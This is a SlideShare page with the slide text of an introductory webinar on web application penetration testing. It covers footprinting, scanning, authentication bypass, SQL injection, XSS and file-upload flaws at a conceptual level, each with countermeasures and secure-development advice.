Download as PDF, PPTX
![Who am i
I’m C Vishwanath [Certified Ethical Hacker]
Senior Operational Professional in IBM
Cyber Security Researcher and Trainer
Founder of E-hacking4all
My Blog: www.e-hacking4all.blogspot.in
Contact: Google my Name ](/proxy?url=https%3A%2F%2Fimage.slidesharecdn.com%2Fciso-wapt-finalppt-201201112006%2F75%2FWeb-Application-Penetration-Testing-2-2048.jpg)
Uploaded byPriyanka Aash
Web Application Penetration Testing
The document outlines a webinar on web application penetration testing by C. Vishwanath, covering various aspects of hacking and ethical hacking. It details the penetration testing process, security vulnerabilities such as SQL injection, Cross-Site Scripting (XSS), and authentication bypass, along with countermeasures to mitigate these risks. The presentation emphasizes the importance of identifying exploitable vulnerabilities in applications to protect sensitive data from potential attackers.
In this document
Powered by AI
Introduction to the webinar on web application penetration testing and the presenter’s background.
Distinguishing between hacking and ethical hacking, detailing roles of hackers and ethical hackers.
The steps involved in the hacking process, including foot printing, scanning, and post-attack activities.
Goals of web application penetration testing and types of testing: Black Box, White Box, and Grey Box.
Describes the security testing methodology and the use of tools to reduce security breach risks.
The process of gathering information to identify vulnerable points in a network system.
Explaining network scanning procedures to discover live hosts and open ports.
Understanding breaching methods in web applications and the structure of corporate networks.
Analyzing authentication bypass vulnerabilities and suggesting countermeasures to prevent such attacks.
Description of SQL injection vulnerability and suggested measures to mitigate such risks.
Details of XSS vulnerabilities and countermeasures to protect against such attacks.
Assessment of risks associated with file uploads and strategies to mitigate vulnerabilities.
Methods for integrating security into the application development lifecycle.
Session dedicated to addressing attendees' questions regarding the material presented.
More Related Content
Similar to Web Application Penetration Testing
Web Application Penetration Testing
- 1. Web Application PenetrationTesting Webinar
- 2. Who am i I’mC Vishwanath [Certified Ethical Hacker] Senior Operational Professional in IBM Cyber Security Researcher and Trainer Founder of E-hacking4all My Blog: www.e-hacking4all.blogspot.in Contact: Google my Name
- 3. Basics of Hacking Introductionto Penetration Testing Foot printing Scanning Live Practical's Topics Cover in Session
- 4. The Process ofattempting to gain successfully, unauthorized access to computer resources for the purpose of help or secure system is called Hacking. What Is Hacking
- 5. Hacker: • Access computersystem or network without authorization • Breaks the law Ethical Hacker: • Performs most of the same activities but with owner’s permission • Employed by companies to perform Penetration Tests Hacking v/s Ethical Hacking
- 6. Foot printing Scanning Enumeration Attack andGaining Access Escalating Privilege, Covering Tracks and Creating Backdoors Hacking Life Cycle
- 7. Web Application PenetrationTesting The primary objective behind a web application penetration test (WAPT) is to identify exploitable vulnerabilities, weaknesses and technical flaws in applications before attackers are able to discover and exploit them. Web application penetration testing reveals real-world opportunities attackers could use to compromise applications in order to gain access to sensitive data or even take-over systems for malicious and non-business purposes. Penetration Testing
- 8. Penetration Testing Black Box Testing White Box Testing Grey Box Testing The Tester has no prior knowledge of the system he is to test The Tester has complete information that the tester needs to perform the test is provided to him The Tester has partial knowledge of the system is provided to the tester. This is taken as an attack by an external hacker Types of PenetrationTestingTypes of Penetration TestingTypes of Penetration Testing
- 9. The security testingmethodology that we follow to minimize the risk of security breaches and improve the security stature of your applications is by utilizing a series of signature tools and techniques, will attempt to breach your application systems through test techniques that are manually executed Steps in Penetration Testing
- 10. • Foot Printingis a process of collecting as much information as possible about target, for identifying various ways to intrude in to organization network system • Attackers gather publicly available sensitive information • Sources: Whois.domain Netcraft Google hacking ( sensitive Information Gathering) OSIntframework Foot Printing
- 11. • Network Scanningrefers to set of procedures for identfying hosts, ports, and service in network • Objectives of Scanning: To Discover live hosts, ipaddress, & openports Discover operating system and system Architecture Services running on host Source : Nmap Tool Shodan.io Scanning
- 13. Web Application Breachthe Perimeter Internet DMZ Trusted Inside Corporate Inside HTTP(S) Allows HTTP port 80 Allows HTTPS port 443 Firewall only allows applications on the web server to talk to application server. Firewall only allows application server to talk to database server. IIS SunOne Apache ASP .NET WebSphere Java SQL Oracle DB2 Browser
- 14. Bypass Authentication Sql Injection CrossSite Scripting File Upload Vulnerability Practical on Live Hacking
- 15. Authentication bypassvulnerability could allow attackers to perform various malicious operations by bypassing the device authentication mechanism. What's the issue - Authentication bypass exploit is mainly due to a weak authentication mechanism. Bypass Authentication
- 16. Countermeasures for BypassAuthentication: 1. In order to stay protected from authentication bypass attack, it is best to keep all your systems, applications, software and OS up-to- date. 2. It is suggested to not expose authentication protocol in the client- side web browser script. 3. They suggest ensuring that user session IDs and cookies are encrypted. 4. It is recommended to validate all user input on the server side. Bypass Authentication
- 17. SQL injectionis a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. Sql Injection
- 18. Countermeasures for SqlInjection: 1. Source Code Review 2. Sanitizing and validating the input field 3. Checking the privileges of a user’s connection to the database 4. Apply least privilege rule to run the application that access database (Generally we run with admin privileges by default which is not advisable) 5. Use IDS and IPS. I would suggest Snort (IDS- Intrusion prevention system, IPS- Intrusion prevention system) Sql Injection
- 19. Cross-site Scripting (XSS)is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. Cross Site Scripting Vulnerability
- 20. There are twostages to a typical XSS attack: To run malicious JavaScript code in a victim’s browser, an attacker must first find a way to inject malicious code (payload) into a web page that the victim visits. After that, the victim must visit the web page with the malicious code. If the attack is directed at particular victims, the attacker can use social engineering and/or phishing to send a malicious URL to the victim. How Cross-site Scripting Works
- 21. Countermeasures for Crosssite Scripting: 1. Don’t trust any user input 2. Use escaping/encoding 3. Sanitize HTML 4. Set the HttpOnly flag 5. Use a Content Security Policy Cross-site Scripting
- 22. Uploaded filesrepresent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. File Upload Vulnerability
- 23. Counter measures forFile upload Vulnerability: 1. Only allow specific file types– By limiting the list of allowed file types 2. Verify file types – In addition to restricting the file types, it is important to ensure that no files are ‘masking’ as allowed file types. 3. Scan for malware – To minimize risk, all files should be scanned for malware. 4. Use simple error messages – When displaying file upload errors, do not include directory paths, server configuration settings File Upload Vulnerability
- 24. Incorporating security into lifecycle Integratesecurity into application requirements Including information security professionals in software architecture/design review Security APIs & libraries (e.g. ESAPI, Validate, etc.) when possible Threat modeling Web application vulnerability assessment tools How to Secure Web Applications
- 25.